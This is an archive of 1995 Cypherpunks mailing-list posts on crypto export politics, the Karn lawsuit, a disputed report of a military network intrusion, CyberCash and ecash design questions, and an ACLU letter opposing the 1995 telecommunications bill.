>John Pettitt
>email:         jpettitt@well.sf.ca.us (home)
>               jpp@software.net       (work)    


This is EXACTLY the kind of creative uncooperativeness that I was thinking
of, on a different subject, when I proposed that Netscape do anything it
could think of (legally) to sabotage, undermine, subvert, escape, and
otherwise stifle any attempt by the US government to restrict crypto in
general, or its export in particular.  

The fact is, we are all CREATIVE people, and presumably given any particular
set of rules (laws) , it should be possible for us to "comply" with "the
law" in such a way as to be as obstructively obnoxious as possible.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 23 Dec 1995 07:15:58 +0800
To: cypherpunks@toad.com
Subject: Re: Newsweek Nerd 50
Message-ID: <m0tTFuW-0008xjC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:04 PM 12/21/95 -0600, you wrote:

>Cypherpunk Notables on the List: "Newsweek's Epithet"
>Phil Zimmerman: "Crypto Creator"
>Marc Rotenberg: "Privacy Advocate"
>Sameer Parekh: "Protector of Privacy"
>Johan Helsingius: "Crusader"
>and Steven Levy, who sometimes posts here has the byline on the "Year of
>the Net" feature.
>PS to Newsweek -- Prof. Hoffman should be called a "Data Goddess" not a
>"Geek" for exposing those bogus factors the marketdroids want to use to
>control their survey data back up to the population level.

Of course, Newsweek should have included the "baddies" as well:  Dorothy
Denning would be the Wicked Witch of the West, and Sternlight would have
been one of those Winged Monkeys...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 23 Dec 1995 07:38:20 +0800
To: stevenw@best.com (Steven Weller)
Subject: Re: ex encrypted script
Message-ID: <m0tTFzL-0008y5C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:20 PM 12/21/95 -0800, you wrote:
difficult for the amateur attacker.

>>
>>A tale I hear is that when HP had to deliver operating system source to
>>the french government they stripped all comments and changed all variable
>>and subroutine names to 32 byte strings of I 1 0 (zero) and O (uppercase O).
>>It still compiled but was 100% useless to human readers.
>
>There is a commercial product out there from Gimpel Software called _The C
>Shroud_. It removes all structure from the code, replacing it with gotos,
>renames all the symbols to axxxxxxx, converts constants and strings to hex,
>substitutes all #defines and expands all macros, strips all formatting and
>comments, etc., resulting in a perfectly compilable, but infuriatingly
>obfuscated set of source files.
>Steven Weller 


On the other hand, there are some programmers out there whose work product
makes such a product totally redundant!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@qualcomm.com>
Date: Sat, 23 Dec 1995 08:00:21 +0800
Subject: More developments in Karn vs State Dept
Message-ID: <30DB37B1.167EB0E7@qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


I have been updating my web page almost daily with developments
in my case. The latest is that we've written and asked the Court
to accept a Supplementary Memorandum opposing the government's
motion to toss out our suit, and I've backed it up with a Supplementary
Declaration. In it I explain how I just found all of the
source code at issue (the Applied Cryptography diskette) on a public
FTP site in Italy. This took about 10 minutes using Netscape.

I then downloaded the Triple DES code referenced in the earlier
Declarations by NSA Deputy Director Crowell and myself in 1.7
seconds, adding that this is somewhat less time that it takes me
to move to my computer, insert a floppy disk and return to the keyboard.

The government is now asking the judge not to accept these latest
filings. Stay tuned!

The URL again is http://www.qualcomm.com/people/pkarn/export

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@cris.com>
Date: Sat, 23 Dec 1995 06:41:09 +0800
To: cypherpunks@toad.com
Subject: Re: Navy hacked by Air Force?
In-Reply-To: <9512222020.AA20069@all.net>
Message-ID: <55g2ec4xp8.fsf@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


fc@all.net (Fred Cohen) said:

FC> Not my mistake - iw@all.net's mistake - only my correction.  And it
FC> wasn't a correction to an error in this forum - the error appeared
FC> in the Risks forum - the Cypherpunks posting (which I posted) was
FC> the corrected one.  Am I supposed to correct mistakes in other
FC> forums made by other people when I post to Cypherpunks?  (let me
FC> see... in 1928, a mistake was made on page 73 of the New York Times
FC> related to cryptography, ...)

1) The correction makes a difference in the credibility of the
statement, as you must have felt, since you made the change.  Saying
that a reporter called a 40-ish Navy captain a 'whizzkid' is foolish,
while questioning the reasonableness of a reporter calling a 20-ish Air
Force captain a 'whizzkid' is a difference of opinion (see below).
Since you said it was the 'actual text', you should have posted the
actual text, not your correction of it.  If they sent out two messages,
one correcting the other, I find it somewhat difficult to believe that
they didn't at least preface it with a "sorry, we goofed" tag.

FC> Even with only 4 years of service (after graduating from College),
FC> 25-27 years old is no longer whizzkid age in my book.

2) As I said before, had I remained in ROTC, I would have been 24 when
I was eligible to make captain.

3) At 26, I was still being referred to, by non computer-savvy people,
in terms comprable to 'whizzkid'.

FC> But even more
FC> importantly, the readers who commented on this one error ignored the
FC> main body of facts in the posting in favor of creating a conspiracy
FC> theory.  Next we find out from yet another story that at least part
FC> of the original story posted to Risks was in error.  According to
FC> the second independent source, the Captain was working with the
FC> Navy's support and knowledge.  How much do you want to bet that the
FC> story changes again by Tuesday?

4) The original story said that it was a "secret experiment" conducted
in front of "Pentagon VIPs" "at the Electronic Systems Centre at Hanscom
Air Force Base".  Saying that the Navy was informed that this test would
be made, or that Navy personnel were among the watching VIPs, is
unremarkable, and does not call into question the original report.
There were many security 'surveys' conducted against my systems by AFIWC
(sorry, I don't remember the name of the specific group that does the
surveys, but it's part of AFCERT) which I was unaware of which were
authorized by the Air Force - in fact, I wouldn't be surprised if the
"young Air Force captain" was from that group.

5) The second independent source backs up the report that the connection
was made through the Internet, involving email connectivity, and with a
personal computer and modem, all of which were specifically denied in
the message from IW.

	Now that I've addressed ALL of the points in the 'denial' from
IW, do you see why I characterized it as a military smokescreen?  The
only thing in it which remains unchallenged is that the original report
is inaccurate in detail, and that there is a question as to whether
someone in their mid-20s is a 'whizzkid'.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3
Junk email is NOT appreciated.  If I want to buy something, I'll find
you.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RobL <robl@on-ramp.ior.com>
Date: Sat, 23 Dec 1995 07:51:05 +0800
To: vin@shore.net (Vin McLellan)
Subject: Re: Navy hacked by Air Force?
Message-ID: <m0tTGeA-000RpHC@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:58 PM 12/22/95 -0500, Vin McLellan wrote:
>        Drescher/Cohen/Drescher/Drescher/Cohen/Cohen....
>
>        I'm new to C'punks, so I don't yet have a grip on the context in
>which you consider privacy, property, and other ultimate values.  I do
>wonder, though: Do you spend a lot of time pissin' on each other's shoes
>like this?

Laughing my ass off here.. not yet I have seen someone so precisely hit the
nail on the head..
Seems this is happening a lot lately.. must be the tension of the holiday
season.. <g>

Guess I need to start adding plastic shoe-guards to the C-punk kit.. ;)

------------------|-----------------------------------------------------------
Rob Lowry         |                   
PO Box 288        | 
Rockford Wa 99030 | ral@otc.mhs.compuserve.com           robl@on-ramp.ior.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Sat, 23 Dec 1995 05:17:09 +0800
To: dreschs@austnsc.tandem.com
Subject: Re: Navy hacked by Air Force?
In-Reply-To: <55oht13r97.fsf@galil.austnsc.tandem.com>
Message-ID: <9512222020.AA20069@all.net>
MIME-Version: 1.0
Content-Type: text


> fc@all.net (Fred Cohen) said:
> 
> FC> Credible? No.  Accurate? Yes.  We all make mistakes, and whenever I
> FC> find one that I've made, I try to admit it and fix it ASAP.  What's
> FC> not credible is people who don't correct mistakes when they find
> FC> them.
> 
> 	Well, you corrected it, but you didn't admit it, at least not
> here, and it makes people who made comments on the _original_ version
> look like fools.  Next time when you quote a corrected article, please
> note that it's been corrected.  The difference between an AF captain (4
> years of service) and a Navy captain (17-ish years of service) is
> substantial when when judging whether they could be considered
> 'whizzkids' in this environment.

Not my mistake - iw@all.net's mistake - only my correction.  And it
wasn't a correction to an error in this forum - the error appeared in
the Risks forum - the Cypherpunks posting (which I posted) was the
corrected one.  Am I supposed to correct mistakes in other forums made
by other people when I post to Cypherpunks?  (let me see... in 1928, a
mistake was made on page 73 of the New York Times related to cryptography, ...)

Even with only 4 years of service (after graduating from College), 25-27
years old is no longer whizzkid age in my book.  But even more
importantly, the readers who commented on this one error ignored the
main body of facts in the posting in favor of creating a conspiracy
theory.  Next we find out from yet another story that at least part of
the original story posted to Risks was in error.  According to the
second independent source, the Captain was working with the Navy's
support and knowledge.  How much do you want to bet that the story
changes again by Tuesday?

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald E. Eastlake 3rd" <dee@cybercash.com>
Date: Sat, 23 Dec 1995 05:05:42 +0800
To: David Klur <dklur@dttus.com>
Subject: Re: Cybercash questions...
In-Reply-To: <9511228196.AA819668788@cc1.dttus.com>
Message-ID: <Pine.SUN.3.91.951222152659.29664G-100000@cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Dec 1995, David Klur wrote:

>      
>      Hello,
>      
>      Just a few questions about Cybercash...
>      
>      - How is the consumer's credit card # stored on his hard drive?  
>      Encrypted with the bank's public key? Or does the consumer have a 
>      private key?

The customer has a private key.  Customer info on their machine is
encrypted under a password.

>      - How does the merchant know where to ship the goods?  Is the merchant 
>      required to ship the goods to the billing address on the cardholder's 
>      credit card account?  If so, does the bank provide the merchant with 
>      this info?  How is it encrypted?  Or does the customer indicate to the 
>      merchant where to ship the goods?  Also, what infor does the merhcant 
>      send to Cybercash, and how is it encrypted?

Billing address establishment is part of shopping.  It need not be
the card billing address.  But the customer needs to enter an
addreess when setting up their credit card. see
	draft-eastlake-cybercash-v08-01.txt
in any of the IETF shadow directories.

>      The fraud possibility I see is that Bob could steal Alice's encrypted 
>      credit card number (by sniffing when she buys something at Charlie's 
>      Internet shop).  Then, without decrypting it, he could use it (still 
>      encrypted) at Don's Internet shop, and ask Don to ship the goods to 
>      Bob's address.  Since Don will not decrypt Alice's card number he will 
>      not know that it is not Bob's card.  Cybercash will validate Alice's 
>      card, but will not know that it is really Bob who is the customer.  
>      Don will ship the goods to Bob, and Alice will get a fraudulent charge 
>      on her bill.

The customer signs the message including the merchant id and order id
before encrypting a bunch of stuff including the credit card number
to send to the merchant.  There isn't anything useful to steal from
the ecnrypted part of that message.

>      Am I missing something?

Donald
=====================================================================
Donald E. Eastlake 3rd     +1 508-287-4877(tel)     dee@cybercash.com
   318 Acton Street        +1 508-371-7148(fax)     dee@world.std.com
Carlisle, MA 01741 USA     +1 703-620-4200(main office, Reston, VA)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lvhove@vnet3.vub.ac.be (Leo Van Hove)
Date: Sat, 23 Dec 1995 08:09:11 +0800
To: ecash@digicash.com
Subject: Re: [ecash] Re: Multi-issuer questions
Message-ID: <v01530501ad006a1fc797@[134.184.16.171]>
MIME-Version: 1.0
Content-Type: text/plain


>On Tue, 19 Dec 1995, Marcel van der Peijl wrote in the ecash mailing list:
>
>> Q: If user A signs up with bank A, and merchant B signs up with bank B,
>> can user A buy at merchant B?
>>
>> A: In theory:
>>
>> Bank A and bank B need to have an interbank clearing agreement. User
>> A sends his money to merchant B. Merchant B contacts his own bank,
>> bank B. Bank B recognizes the money as being issued at bank A,
>> contacts bank A, and clears the coins there. Bank A credits bank B's
>> account at bank A, bank B sends an acknowledge to merchant B and
>> merchant B sends the goods to user A.
>

On Fri, 22 Dec 1995, Patiwat Panurach <pati@ipied.tu.ac.th> replied:

>        I dispute this even on theoretical grounds.
>
>Am I right in assuming that the only reason Bank B has in contacting Bank
>A is to confirm that the ecash hasn't been double spent?  Once that is
>confirmed, there should be no need for contact between the two banks.
>Bank A should not have to credit Bank B's account as there has been no
>transfer from Bank A to Bank B.  The transfer has been the deposit from
          ---------------------
I guess you mean: from Bank B to Bank A

>Bank B's customer to Bank B. Bank B is allready "credited", i.e., its
>(e)cash researves have increased, the moment Bank A confirms that the
>ecash is valid.
>

In my understanding - and I'm sure Marcel van der Peijl :-) will correct me :-(
if I'm wrong - the only way Bank B can verify with Bank A that the
ecash it has received from merchant B has not been spent before is by
actually sending the _coins_ to Bank A.  Hence there _is_ a transfer from
Bank B to Bank A and thus Bank A has to credit Bank B's account...

Marcel?

Ciao,

leo



_________________________________________________________________________
Leo Van Hove

Centre for Financial Economics
Vrije Universiteit Brussel (Free University of Brussels)
Pleinlaan 2
B-1050 Brussels
Vox: +32 2 629.21.25
Fax: +32 2 629.22.82
e-mail: lvhove@vnet3.vub.ac.be

VUB's Web site: http://www.vub.ac.be
_________________________________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 23 Dec 1995 08:49:37 +0800
To: cypherpunks@toad.com
Subject: Re: Navy hacked by Air Force?
Message-ID: <199512230006.QAA06030@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Dec 1995, Vin McLellan wrote:

>         This might be relevant. This is a page from the NCCOSC web site
> <http://www.nosc.mil>

Thanks for posting this.  It was very helpful.  

>         The Naval Command, Control  & Ocean Surveillance Center (NCCOSC)
> is the U.S. Navy's warfare center for command, control and communication
> systems and ocean surveillance and the integration of those systems which
> overarch multiplatforms. NCCOSC is based in San Diego, CA.
> 
>         Note that NCCOSC recently decided to beef up NCI's user
> authentication.  See "Current Initiatives."

Duly noted ... (as long as it don't lead to a false sense of security)

> [* ] NCI net - What it is
> 
>    * An enterprise network serving NCCOSC and other communities of interest
>    * Modelled after the global Internet, logically part of the Internet
         ...
>    * Provides ubiquitous high-speed low-delay TCP/IP connectivity throughout
>      the organization and to the Internet
>    * Provides dialup access from home or TDY via 1-800 number, including
>      SLIP and PPP support

Betchya that WATS line gets a whole lotta billings to it. <p>

>    * MIME adopted as corporate email standard, email systems upgraded
>         o Many user agents upgraded to MIME compliance
>         o Testing gateways for interoperability with non-compliant systems
>         o Performing extensive interoperability tests

MIME??!!??  They adopted MIME??!!?? 

Good grief.  This is not good ... not good at all.  

>    * New sites connected
>         o CINCLANTFLT, Norfolk, VA
>         o The Pentagon
>              + BRAC Office
>              + OSS LAN
>              + DASN/C3I

Oh no ... it's worse ... *sigh* ... 

no wonder that Newt and Dole had such a grim look on their faces when they
emerged from their scheduled one-hour, (went for two) meeting with the US
President -- the one that was the day before the freshman congress persons
did their incredible end-run on their own leadership. 

Impressive.  Truly.

What would have caused both Newt and Dole to flush like they did?  Did
they demo a hack into the personal e-mail of the Vice-Chairman of the JCS? 

>    * New Web server installed
>         o "neelix", a Sun SparcServer 1000, installed outside firewall
>         o "www.nosc.mil" now points at neelix

Pretty firewall ... nice firewall ... <p>

>    * Enhancing Infrastructure to provide ISDN dialup service

Good idea.  ISDN dialup provides significant bandwidth.  Very significant
bandwidth. Almost enought to control a battleship.  (If there were any
battleships, I mean). 

>    * Upgrading D.C. area connectivity to Metropolitan Fiber service at 10
>      Mbps
>    * Getting sites 100% connected (TCP/IP to every desktop)
>    * Developing MIME to X.400 gateway for connectivity to DMS world

Yep.  Perfect.  Just what the doctor ordered.  TCP/IP to every desktop.
And MIME for all.  Oh, and to ice the cake, toll-free ISDN dial-ins.

Hmm, let's see ... for Christmas Santa ... I'd like a packet-switched 
network with a public outdial to a toll-free ISDN dial-in ... oh, that 
and a Gulfstream V under the Christmas tree.

What are they going to do next, give everyone some Czechoslovakian C-4?

Stick a bit of civilian software into all of this, and let's all have a
good look at whether someone can take over something a little more
interesting than a battle ship. 

Like maybe an aircraft carrier?? 

Gee, that oughta harden their drawers ...



Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

P.P.S.  Feel free to repost widely ... IW ... c4i-pro ... wherever ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Sat, 23 Dec 1995 07:24:30 +0800
To: :@shore.net
Subject: Re: Navy hacked by Air Force?
Message-ID: <v02130505ad00cd3a2c68@[198.115.178.219]>
MIME-Version: 1.0
Content-Type: text/plain


        This might be relevant. This is a page from the NCCOSC web site
<http://www.nosc.mil>

        The Naval Command, Control  & Ocean Surveillance Center (NCCOSC) is
the U.S. Navy's warfare center for command, control and communication
systems and ocean surveillance and the integration of those systems which
overarch multiplatforms. NCCOSC is based in San Diego, CA.

        NCCOSC Command Internet (NCI) is part of NCCOSC, of course -- and
NCCOsc is part of SpaWar (Space and Naval Warfare Systems Command.)  Clear?

        Note that NCCOSC recently decided to beef up NCI's user
authentication.  See "Current Initiatives."

=================
[* ] NCI net - What it is

   * An enterprise network serving NCCOSC and other communities of interest
   * Modelled after the global Internet, logically part of the Internet
   * Communications nodes at each NCCOSC site, linked by T-1 lines
   * Nodes consist of...
        o Cisco router linking T-1 lines and local LANs
        o  Annex terminal server and modem bank for dialup, SLIP, and PPP
          access
        o Sun servers providing general Internet services (email, name
          service, ftp server, world wide web, multicast routing, etc.)
        o NeXT server supporting corporate office functions
   * Provides ubiquitous high-speed low-delay TCP/IP connectivity throughout
     the organization and to the Internet
   * Provides dialup access from home or TDY via 1-800 number, including
     SLIP and PPP support

[* ] [ ]  Network Topology

[* ] Recent activities and milestones

   * MIME adopted as corporate email standard, email systems upgraded
        o Many user agents upgraded to MIME compliance
        o Testing gateways for interoperability with non-compliant systems
        o Performing extensive interoperability tests
   * New sites connected
        o CINCLANTFLT, Norfolk, VA
        o The Pentagon
             + BRAC Office
             + OSS LAN
             + DASN/C3I
        o FTSCLANT (Portsmouth, VA) and NAVSEACENPAC (San Diego, CA)
        o Armed Forces Staff College, Norfolk, VA
        o USACOM site in Suffolk, VA
             + Joint Training, Analysis, and Simulation Center (JTASC)
             + NISE East Contingent at USACOM
        o NISE West Guam
        o NISE West Yokosuka Japan
   * Network accredited
        o Completed Security Test and Evaluation
        o Completed Risk Assessment
        o Published Contingency Plan and Configuration Management Plan
   * Network now under full configuration management
   * New Web server installed
        o "neelix", a Sun SparcServer 1000, installed outside firewall
        o "www.nosc.mil" now points at neelix
        o "Planet Earth" now served by neelix
        o Recent updates
             + 1 additional Sparc processor (completed 6/9/95)
             + 4 Gb more disk (completed 6/2/95)
             + another 64 Mbytes of memory (giving total of 96 Mbytes)
               (completed 6/2/95)
             + conversion to "Apache" http server (faster) (completed
               6/1/95)

[* ] Current Initiatives

   * Enhancing Infrastructure to provide ISDN dialup service
   * Implementing one-time-passwords using SecurID cards
   * Implementing Kerberos based authentication for additional security
   * Connecting additional sites
        o NISMC
        o USACOM at CINCLANT compound, Norfolk, VA
        o Pearl Harbor Naval Shipyard, Pearl Harbor, HI
        o Federal Internet Exchange (FIX) East, College Park, MD
        o New NISE East Detachment at Naval Weapons Station, Yorktown, VA
        o ONI at NMIC
   * Upgrading D.C. area connectivity to Metropolitan Fiber service at 10
     Mbps
   * Getting sites 100% connected (TCP/IP to every desktop)
   * Developing MIME to X.400 gateway for connectivity to DMS world

[* ] References

   * Dialup Quick Guide
   * Monthly Reports
   * June 28 Internet Security Briefing (postscript)

    Vin McLellan +The Privacy Guild+ <vin@shore.net>
 53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548
                <*><*><*><*><*><*><*><*><*>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Sat, 23 Dec 1995 06:46:40 +0800
To: dreschs@austnsc.tandem.com
Subject: Re: Navy hacked by Air Force?
In-Reply-To: <55g2ec4xp8.fsf@galil.austnsc.tandem.com>
Message-ID: <9512222132.AA21783@all.net>
MIME-Version: 1.0
Content-Type: text


...
Not to be picky, but...

> 1) The correction makes a difference in the credibility of the
> statement, as you must have felt, since you made the change.

I agree that the change was important, but...

>  Saying
> that a reporter called a 40-ish Navy captain a 'whizzkid' is foolish,
> while questioning the reasonableness of a reporter calling a 20-ish Air
> Force captain a 'whizzkid' is a difference of opinion (see below).

We don't yet know how old he or she was - let's wait and see before we
jump the gun. 

> Since you said it was the 'actual text', you should have posted the
> actual text, not your correction of it.

My text was the one published in the IW forum - Risks published first,
the error was apparently found and corrected, and thus the IW forum had
the corrected text.  I will ask iw to inform Risks of the correction -
however, I did post the actual text that I got from IW!  This IT is
so complex, isn't it?

> If they sent out two messages,
> one correcting the other, I find it somewhat difficult to believe that
> they didn't at least preface it with a "sorry, we goofed" tag.

They were to different forums, hence the "I goofed" tag would seem
inappropriate in IW.  Perhaps the next risks will include an 'I goofed'
let's wait and see.

> FC> Even with only 4 years of service (after graduating from College),
> FC> 25-27 years old is no longer whizzkid age in my book.
> 
> 2) As I said before, had I remained in ROTC, I would have been 24 when
> I was eligible to make captain.
> 
> 3) At 26, I was still being referred to, by non computer-savvy people,
> in terms comprable to 'whizzkid'.

I must be getting old.  When I was growing up, all Wiz kids had to be 21
or less.  I guess the media is running out of 18-year olds making a big
splash.

...
> 5) The second independent source backs up the report that the connection
> was made through the Internet, involving email connectivity, and with a
> personal computer and modem, all of which were specifically denied in
> the message from IW.

I must have read it differently.  I thought that IW said something like
not all email messages, and email messages did not reproduce, not that
there were no email messages involved.  I guess we both have to start
reading more carefully.

> 	Now that I've addressed ALL of the points in the 'denial' from
> IW, do you see why I characterized it as a military smokescreen?  The
> only thing in it which remains unchallenged is that the original report
> is inaccurate in detail, and that there is a question as to whether
> someone in their mid-20s is a 'whizzkid'.

I think that the whole issue is still pretty questionable - whether the
experiment was authorized - whether it was a wiz kid - whether they
actually took control - whether it came from the Internet or a Mil net -
whether there was insider knowledge - etc.  One thing I am becoming more
certain of though - that there are no active battleships.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lynnclu@aol.com
Date: Sat, 23 Dec 1995 12:25:16 +0800
To: ACLUNATL@aol.com
Subject: ACLU Cyber-Liberties Update, 12/22/95
Message-ID: <951222163250_21785823@emout05.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


----------------------------------------------------------------
December 22, 1995
ACLU CYBER-LIBERTIES UPDATE
A bi-weekly e-zine on cyber-liberties cases and controversies
at the state and federal level.
----------------------------------------------------------------
IN THIS ISSUE:

*    ACLU Letter to U.S. Senators Opposing the Telecommunications
Deregulation Bill, S. 652 (H.R. 1555) As Reported by the Conference Committee

----------------------------------------------------------------
FEDERAL PAGE (Congress/Agency/Court Cases)
----------------------------------------------------------------

December 22, 1995
Via Fax

     Subject:  Why the Telecommunications Deregulation Bill, S. 652 (H.R.
1555),
               As Reported by the Conference Committee Should Be Rejected


Dear Senator:

The American Civil Liberties Union urges you to vote against S. 652 (H.R.
1555), the
telecommunications deregulation bill as reported by the conference committee.
 The conference committee has produced a bill that will immediately damage
freedom of expression, the bedrock value at the core of the First Amendment
and will structure the telecommunications industry so that free speech and
privacy are in permanent jeopardy.  While the final text is still being
written, these provisions are sufficiently destructive that they warrant
rejection of the entire bill.

Many reasons could be cited why S. 652 should be rejected;  we will focus on
just three areas where the conferees have needlessly chosen to attack
essential First Amendment values.

 I.  The "Deregulation" Bill Will Establish a Big Government Censorship
Regime with
     New Speech Crimes for the Internet and Online Communications.

Title V of the telecommunications bill as adopted by the conference committee
will:

-    Subject first-year college students under 18 to two years in prison and
$100,000 fine if they engage in overly salacious dating patter online (even
in their private e-mail).

-    Subject parents to the same prison term and fine if they provide their
own teen-ager with online materials that the parents have decided have merit
if the material is deemed to violate the bill.

-    Subject adults merely looking on their own home computer at something
deemed
obscene to prison for five years for the first peek, plus another ten years
if they look
again.  This is not far-fetched.  Electronic "footprints" are left behind
whenever a user       goes somewhere in cyberspace.  Some of the censorship
groups backing the bill      openly support prosecuting anyone who looks at
such material as way of "drying up" demand for it -- so these groups have an
incentive to pressure prosecutors to follow those footprints back to the
adults at home.

-    Effectively reduce voluntary communications among consenting adults to
those
appropriate only for children.  Much of what consenting adults -- even
married consenting
adults -- prize about some of  their communications could well be deemed by
outsiders as indecent if addressed to minors.  The bill will infantalize all
communications in cyberspace as users worry about how to avoid prosecution if
prohibited material is sought out by someone underage.  The educational value
of the Internet would be reduced to the equivalent of the children's section
in the video store.

-    Define its new speech crimes so broadly that it will hold access and
service providers
criminally liable for content they did not create unless the providers have
legal
departments large and skilled enough to utilize limited and vague defenses.
 Even then, the defenses would have to be established in costly and
time-consuming court proceedings.  The predictable effect will be enormous
self-censorship, coerced by the government's failure to precisely define what
is being made criminal and the threat of prison for transgressors.

-    Subject all Americans to the most narrow of community standards found in
the most
socially limiting of locations.  Even those who have chosen to adopt the
social mores of
such locations should not insist on imposing those mores on the millions of
Americans who have chosen to live elsewhere. 

These proposals violate the Constitution.  They are also profoundly bad
public policy.
          
Title V of the bill is unconstitutional because it takes speech protected by
the First Amendment and tries to regulate it in a way that violates what the
Supreme Court has said must be the touchstone for regulating protected
speech.  For example, the bill fails to use the constitutionally required
"least restrictive means" to obtain its putative goals.  It also fails to
take into account the particular characteristics of interactive media in the
online environment, rendering its attempt to create new speech crimes
constitutionally impermissible.  Title V also unconstitutionally invades the
privacy rights of those who communicate online.   

Cyberspace is the first genuinely mass medium in human history, where many
individuals can speak to many others at the same time, and where the
"start-up" costs of "publishing" are so minimal that almost all users are
potential publishers.  This is a democratic and truly libertarian
communications medium without a centralized governing body.  There is no
network president or standards department, for example, ultimately overseeing
everything that is broadcast -- in fact there is no "network" but instead an
endless series of independent areas like newsgroups, chat rooms, bulletin
boards and web sites.  The conference bill tries to force cyberspace into the
mold of the old media
with a government-dictated, centralized command structure.  

Cyberspace gives its users -- including parents concerned about their
children --  an
unprecedented power over what materials are  accessed, or not accessed, from
their computers.  Parents, for example,  already have available software and
other technology that will let them control what their children access from
their computer.

Tragically, the conferees have rejected further private sector development of
user
empowerment technologies.  Instead, the conference bill imposes the most
restrictive regime of government  regulation over content on what should be
the least governmentally  restricted of all media.  In doing so, the bill
would strangle cyberspace, violating the free speech and privacy rights of
all those who communicate online.  

The ACLU believes that all adults have the right to choose for themselves
what they see or say online.  The conferees have chosen to invest a minority
of  censorship extremists with the coercive power of the criminal law and
Federal prison in order to impose on the rest of us their constricted view of
what we should say or see. 

This is a truly historic turning point.  Title V of the bill from the
conference committee confronts the Congress with a stark choice: 
     
-    Will the 104th Congress be seen in history as one who stood up for the
freedom of communications in cyberspace and the Internet, or will it be
counted as a tool of certain censorship groups determined to impose their
conception of "proper" speech on all of us?

-    Will the 104th Congress stand up for the continuing vitality of private
sector
development of interactive media, or will it impose a big-government
bureaucratic regulatory regime on cyberspace and the content of its
communications?

-    Will the 104th Congress stand up for empowering users -- including
parents concerned about their children -- to control what material is
accessed from their computers, or will it give the coercive power of federal
prison sentences to censorship groups who care more about interfering with
what other adults see or say than about protecting their own children?

II.  The "Deregulation" Bill Will Impose a Big-Government Censorship Regime
on
     Television Programming.

The conference committee has agreed to V-chip language in S. 652 that will
stifle expression on broadcast and cable television and prevent parents from
exercising greater control over their children's television viewing habits.
 The V-chip provision will vest the government, not parents, with control
over which television programs make their way to the family television set.

The V-chip hardware is technology that will automatically block a program
from television reception if it carries a certain encoded rating in its
transmission.  The encoding would be transmitted on the same signal that
currently carries closed captioning information.  

However, the V-chip requirement does more than simply call for new hardware
in television sets; the bill would set up a television rating system driven
by government guidelines on content.  Although the television industry is
given a one-year window to "voluntarily" develop and transmit an encoded
ratings scheme for violent, sexual, or indecent programing, the Federal
Communications Commission would have the power to reject the industry's
system in favor of its own.  In this way,  the government ultimately decides
what content is appropriate for viewing and what is not.

The bill calls for the government to form an "advisory committee" to set
recommendations for guidelines on rating content, and those guideline will be
formally issued by the FCC.  Although the V-chip's congressional sponsors
have claimed that these guidelines will not be mandatory, the ratings
guidelines will surely have a chilling effect on the creative process in
television programming. Would producers make a television mini-series about
the violent Civil War?  Perhaps not, if the broadcast will automatically be
blocked from the television sets of countless families who will not have the
opportunity to make an independent judgement as to the program's
appropriateness. 

The weightiest and clearest guidelines for content rating would be that of
the government. Such chilling of expression by the government violates the
First Amendment.  The Supreme Court has held that violent expression enjoys
full constitutional protection.  Furthermore, what would constitute "sexual"
expression would be left up to the government's advisory committee or the
industry's "voluntary" internal censors.  Would a news program or documentary
on breast cancer be blocked as "sexual" expression?  That answer is yet
unclear, but what is clear is that the encoded ratings will block expression
fully protected by the First Amendment.

Furthermore, the V-chip scheme created by Congress completely shuts out
families from the decision making process.  Instead, it empowers bureaucrats
and television executives to make decisions for parents.  Would the V-chip's
automatic censors block out such "violent" programs as "Schindler's List,"
"Roots," or "The Burning Bed"?   

Other options for true parental control and choice in children's television
viewing will be
destroyed by the government's V-chip mandate.  Private companies have
recently developed technology, such as the Telecommander and the TV Guardian,
that would empower parents to screen out the programs or stations that they
feel are inappropriate for their children.  Additionally, there is the
possibility of a true "choice chip," which would allow parents to subscribe
to the private rating service of their choice, whether run by the National
PTA, TV Guide or the Christian Coalition.

Technology and initiatives developed by private business will be crushed by
the government's mandatory censoring technology and ratings system.  The
government will step in as a surrogate parent to turn off the television when
a child turns to the "wrong" channel.  However, the government's version of
what is "wrong" might include a documentary, an afterschool special, or other
programming that a parent would actually want their child to watch.  Thus,
the "V" in V-chip is for the government's "victory" over parental control and
the First Amendment.

III.      The Bill Will Foster Communications Monopolies that Stifle
Diversity and Free Speech.

A core value of the First Amendment's guarantees of free speech and free
